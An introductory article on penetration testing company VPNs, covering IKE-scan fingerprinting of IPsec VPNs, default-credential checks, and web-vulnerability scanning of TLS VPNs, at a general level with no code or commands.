Learning How to Pen Test VPNs

Many businesses use virtual private networks to allow their employees to access their systems securely and avoid sending sensitive company data through unencrypted internet connections. With a VPN, workers can easily connect to their employer’s network from anywhere in the world. However, a VPN can also lure some people into a false sense of security and cause them to let their guard down.

To maintain the security and privacy that a VPN is designed to offer, it is essential that both the businesses and the employees who use them understand how to keep them secure.

Pen Testing

Penetration testing is a common practice in cybersecurity. In order to pen test a system, the tester assumes the role of an attacker and then tries to infiltrate or interfere with the network in a way that an attacker would. By attacking your own systems and networks, you can identify any security holes and work to patch them up as swiftly and efficiently as possible.

From the perspective of an attacker, a VPN is often like a big, flashing neon sign that says, “Sensitive data here!” Experienced attackers will look for signs like this that indicate a worthy target. If they think they have found a connection through which sensitive, and potentially valuable, data is flowing, they have a greater motivation to try and attack it.

You shouldn’t just add a VPN to your network and then assume that everything is secure. You should subject your VPN to the same pen testing that you use to keep your main business network safe from intruders.

The steps you take to properly pen test your VPN will depend upon the type of VPN that you are dealing with. Your VPN will be based on one of two security protocols IPsec or TLS (or its predecessor, SSL). Let’s take a look at how we pen test each of them.

IPsec VPN

If you have an IPsec VPN, you will want to download a tool called IKE-scan. This tool is developed by NTA Monitor and can provide vital information for ensuring the security of your network. For one thing, it can fingerprint many of the most common VPN suppliers, and the most commonly used VPN-enabled routers. Armed with the information generated from this tool, a potential attacker could search the internet, looking for attack vectors which can be used against specific service providers or brands of hardware.

Not every VPN will be susceptible to this fingerprinting, and there will not always be exploits available for an attacker to use. However, it can reveal some basic information, such as the authentication type the VPN uses, which is of tremendous use to a potential attacker. There are corresponding tools and software which automate the process of exploiting specific weaknesses in a VPN.

Identifying which exploits are out there for your VPN will allow you to address any issues you find and fix any holes in your security. In addition to doing this, make sure that you check your VPN, and all your associated network devices, and ensure that none of them are making use of default account details. It is easy for anyone to find the default login settings for services or routers.

TLS VPN

On the other hand, if you have a TLS VPN, you will want to begin the process in the same way as outlined above, by scanning your network with IKE-scan. However, you should also deploy tools like Watchfire and Webinspect, which can check for other attack vectors that could be used against you. TLS VPNs can be attacked with cross-site scripting (XSS), SQL injections, and buffer overflows. These attack vectors are considered outdated by many, but this can lead to a lowering of the guard.

Many of these tools will allow you to not only scan your network for potential threats but can also follow this up with either manual or automated attacks. These will provide you with concrete evidence as to whether you are vulnerable or not.

A VPN is designed to offer users enhanced privacy and security. However, if you simply install a VPN and assume that you are therefore fully secure, you are asking for trouble. You should subject your VPN to the same pen testing that you would any other network component.